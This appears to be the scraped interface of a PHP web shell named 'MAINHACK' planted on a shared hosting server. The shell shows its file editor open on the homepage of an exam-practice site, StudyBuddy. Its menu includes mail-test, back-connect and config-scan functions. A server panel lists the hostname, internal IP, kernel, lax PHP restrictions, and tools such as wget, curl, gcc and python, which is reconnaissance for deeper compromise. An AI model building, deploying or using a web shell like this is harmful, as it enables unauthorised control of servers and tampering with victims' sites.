[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index1.php
<?php include("header.php"); ?> <!-- // Header include --> <script> function check_package(value){ var val="<?=$_SESSION['package_status']?>"; //alert(val); if(val=="YES"){ alert('You already have a existing package.'); }else if(val=="NO"){ window.location = "single.php?pid="+value; }else{ alert('Please login to see the package details'); } } </script> <!-- Banner video --> <section class="banner"> <div class="container"> <div class="row"> <div class="col-md-6 col-sm-6 col-sx-6"> <h2> Don’t just study—practice smart. Prepare better, score higher—with StudyBuddy.</h2> <p> Join thousands of users who’ve improved their scores and boosted their confidence with our interactive mock test platform.Sign up now and take your first test for free. Ready to go premium? Explore our affordable paid plans and unlock full access to live test features!</p> <a href="contact.php">Get Started <i class="fa fa-angle-double-right" aria-hidden="true"></i></a> </div> <div class="col-md-6 col-sm-6 col-sx-6"> <img src="images/b1.png" alt="" class="banner-rt-img" data-aos="zoom-in"/> </div> </div> </div> </section> <!-- // Banner Slider --> <!-- Live Practice --> <section class="Live-Practice"> <div class="container"> <div class="home-title"> <h2>Live Practice</h2> <h6>StudyBuddy offers live tests for real-time exam preparation success.</h6> </div> <div class="row"> <?php $count=1; $stmt=$show->readAll('category'); $num=$stmt->rowCount(); if($num>0){ while($row=$stmt->fetch(PDO::FETCH_ASSOC)){ ?> <div class="col-md-4 col-sm-4 col-sx-6"> <div class="Practice-box"> <img class="img-Practice" src="images/c2.png" alt=" "> <div class="Practice-box-text"> <h3><?=$row['category']?></h3> <p>Start practicing now to stay ahead and excel in <?=$row['category']?></p> </div> </div> </div> <?php } } ?> <!-- <div class="col-md-4 col-sm-4 col-sx-6"> <div class="Practice-box"> <img class="img-Practice" src="images/c3.png" alt=" "> <div class="Practice-box-text"> <h3>Free <span>Science</span></h3> <p>Ras effic itur metusga via suscipit</p> </div> </div> </div> <div class="col-md-4 col-sm-4 col-sx-6"> <div class="Practice-box"> <img class="img-Practice" src="images/c4.png" alt=" "> <div class="Practice-box-text"> <h3>Free <span>Mathematics</span></h3> <p>Ras effic itur metusga via suscipit</p> </div> </div> </div> <div class="col-md-4 col-sm-4 col-sx-6"> <div class="Practice-box"> <img class="img-Practice" src="images/c5.png" alt=" "> <div class="Practice-box-text"> <h3>Free <span>Ww Recognize</span></h3> <p>Ras effic itur metusga via suscipit</p> </div> </div> </div> <div class="col-md-4 col-sm-4 col-sx-6"> <div class="Practice-box"> <img class="img-Practice" src="images/c6.png" alt=" "> <div class="Practice-box-text"> <h3>Free <span>Online Learning</span></h3> <p>Ras effic itur metusga via suscipit</p> </div> </div> </div> <div class="col-md-4 col-sm-4 col-sx-6"> <div class="Practice-box"> <img class="img-Practice" src="images/c1.png" alt=" "> <div class="Practice-box-text"> <h3>Free <span>Astrology</span></h3> <p>Ras effic itur metusga via suscipit</p> </div> </div> </div> - --> </div> </div> </section> <!-- about-new --> <section class="about-new"> <div class="container"> <div class="row"> <div class="col-md-6 col-sm-6 col-sx-6"> <img src="images/ab001.png" alt="" class="about-new-rt-img" data-aos="zoom-in"/> </div> <div class="col-md-6 col-sm-6 col-sx-6"> <h3>About Us</h3> <h4>Boost Your Exam Preparation with Studybuddy</h4> <p>Welcome to your one-stop destination for mastering exams through real-time practice. Studybuddy is designed to help students, job seekers, and competitive exam aspirants prepare effectively with a wide range of free and paid live tests tailored to various levels and exam formats.</p> <a href="about.php">Read more <i class="fa fa-angle-double-right" aria-hidden="true"></i></a> </div> </div> </div> </section> <!-- Package --> <section class="package"> <div class="container"> <div class="home-title"> <h2>Package</h2> <h6>StudyBuddy provides expert-designed study packages for effective exam preparation.</h6> </div> <div class="row"> <?php $count=1; $stmt=$show->readAll_clause('package','order by id asc'); $num=$stmt->rowCount(); if($num>0){ while($row=$stmt->fetch(PDO::FETCH_ASSOC)){ ?> <div class="col-md-3 col-sm-6 col-sx-6"> <div class="package-box"> <img class="img-package" src="<?=$pic_img?>/<?=$row['img']?>" alt="monthly "> <h3><?=$row['package_name']?></h3> <p>Price : <b>₹</b> <?=$row['price']?></p> <a onclick="check_package('<?=base64_encode($row['package_id'])?>')" class="buy-pack-main"> Buy now </a> <ul> <?=htmlspecialchars_decode($row['specification'])?> </ul> </div> </div> <?php } }?> <!--- <div class="col-md-3 col-sm-6 col-sx-6"> <div class="package-box"> <a href="single.php"> <img class="img-package" src="images/p1.png" alt="quarterly "> <h3>Quarterly Package</h3> <p>Description : Gravida suscipit cursus, dui lorem id lectus.</p> </a> </div> </div> <div class="col-md-3 col-sm-6 col-sx-6"> <div class="package-box"> <a href="half-yearly.php"> <img class="img-package" src="images/p3.png" alt="Half yearly "> <h3>Half yearly Package</h3> <p>Description : Suscipit diam pre lorem id lectus suscipit cursus.</p> </a> </div> </div> <div class="col-md-3 col-sm-6 col-sx-6"> <div class="package-box"> <a href="yearly.php"> <img class="img-package" src="images/p4.png" alt="Yearly "> <h3>Yearly Package</h3> <p>Description : Cras efficitur, metus gravida suscipit cursus.</p> </a> </div> </div> ---> </div> </div> </section> <!-- FAQ Start --> <div class="faq"> <div class="container"> <div class="home-title"> <h2>Frequently Asked Questions</h2> <h6>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</h6> </div> <div class="row"> <div class="col-md-7 col-sm-7 col-xs-12" data-aos="fade-right" style="transition: all 1800ms ease-in-out;"> <button class="accordion">Lorem Ipsum is simply dummy</button> <div class="accordion-content"> <p> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. </p> </div> <button class="accordion">Lorem Ipsum is simply dummy</button> <div class="accordion-content"> <p> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. </p> </div> <button class="accordion">Lorem Ipsum is simply dummy</button> <div class="accordion-content"> <p> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. </p> </div> <button class="accordion">Lorem Ipsum is simply dummy</button> <div class="accordion-content"> <p> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. </p> </div> <button class="accordion">Lorem Ipsum is simply dummy</button> <div class="accordion-content"> <p> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. </p> </div> </div> <div class="col-md-5 col-sm-5 col-xs-12"> <div class="faq-right-content" data-aos="fade-left" style="transition: all 1800ms ease-in-out;"> <img src="images/faq-img.png" alt=""> </div> </div> </div> </div> </div> <!-- Articles --> <section class="articles"> <div class="container"> <div class="home-title"> <h2>Articles</h2> <h6>Cras efficitur, metus gravida suscipit cursus, dui diam pre lorem id lectus.</h6> </div> <div id="articles-news" class="owl-carousel"> <?php $count=1; $stmt=$show->readAll_clause('post','order by id asc'); $num=$stmt->rowCount(); if($num>0){ while($row=$stmt->fetch(PDO::FETCH_ASSOC)){ ?> <div class="item"> <div class="articles-box"> <a href="blog-single.php?id=<?=base64_encode($row['id'])?>"> <img class="img-articles" src="<?=$pic_img?>/<?=$row['image']?>" alt="articles "> <!--<h6><?=date('M d,Y',strtotime($row['date']))?></h6>--> <h5><?=$row['title']?></h5> </a> </div> </div> <?php } } ?> <!---- <div class="item"> <div class="articles-box"> <a href="blog.php"> <img class="img-articles" src="images/blog2.jpg" alt="articles "> <h6>October 3, 2025</h6> <h4>Our Latest Articles</h4> <p>Donec sed tempus enim, a congue risus. Pellentesque euismod massa a quam viverra interdum.</p> </a> </div> </div> <div class="item"> <div class="articles-box"> <a href="blog.php"> <img class="img-articles" src="images/blog3.jpg" alt="articles "> <h6>May 31, 2025</h6> <h4>Our Latest Articles</h4> <p>Donec sed tempus enim, a congue risus. Pellentesque euismod massa a quam viverra interdum.</p> </a> </div> </div> <div class="item"> <div class="articles-box"> <a href="blog.php"> <img class="img-articles" src="images/blog1.jpg" alt="articles "> <h6>September 13, 2025</h6> <h4>Our Latest Articles</h4> <p>Donec sed tempus enim, a congue risus. Pellentesque euismod massa a quam viverra interdum.</p> </a> </div> </div> <div class="item"> <div class="articles-box"> <a href="blog.php"> <img class="img-articles" src="images/blog2.jpg" alt="articles "> <h6>October 3, 2025</h6> <h4>Our Latest Articles</h4> <p>Donec sed tempus enim, a congue risus. Pellentesque euismod massa a quam viverra interdum.</p> </a> </div> </div> <div class="item"> <div class="articles-box"> <a href="blog.php"> <img class="img-articles" src="images/blog3.jpg" alt="articles "> <h6>May 31, 2025</h6> <h4>Our Latest Articles</h4> <p>Donec sed tempus enim, a congue risus. Pellentesque euismod massa a quam viverra interdum.</p> </a> </div> </div> ---> </div> </div> </section> <!-- gallery --> <section class="gallery"> <div class="container"> <div class="home-title"> <h2>All Gallery</h2> </div> <div id="gallery-all" class="owl-carousel"> <div class="item"> <div class="gallery-box"> <a href="images/g0.png" data-lightbox="example-set" data-title=""> <img class="img-gallery" src="images/g0.png" alt="gallery "> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/g1.png" data-lightbox="example-set" data-title=""> <img class="img-gallery" src="images/g1.png" alt="gallery "> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/g2.png" data-lightbox="example-set" data-title=""> <img class="img-gallery" src="images/g2.png" alt="gallery "> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/g3.png" data-lightbox="example-set" data-title=""> <img class="img-gallery" src="images/g3.png" alt="gallery "> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/g4.png" data-lightbox="example-set" data-title=""> <img class="img-gallery" src="images/g4.png" alt="gallery "> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> </div> </div> </section> <!-- Header include --> <?php include("footer.php"); ?> <!-- // Header include -->
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 678.22 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619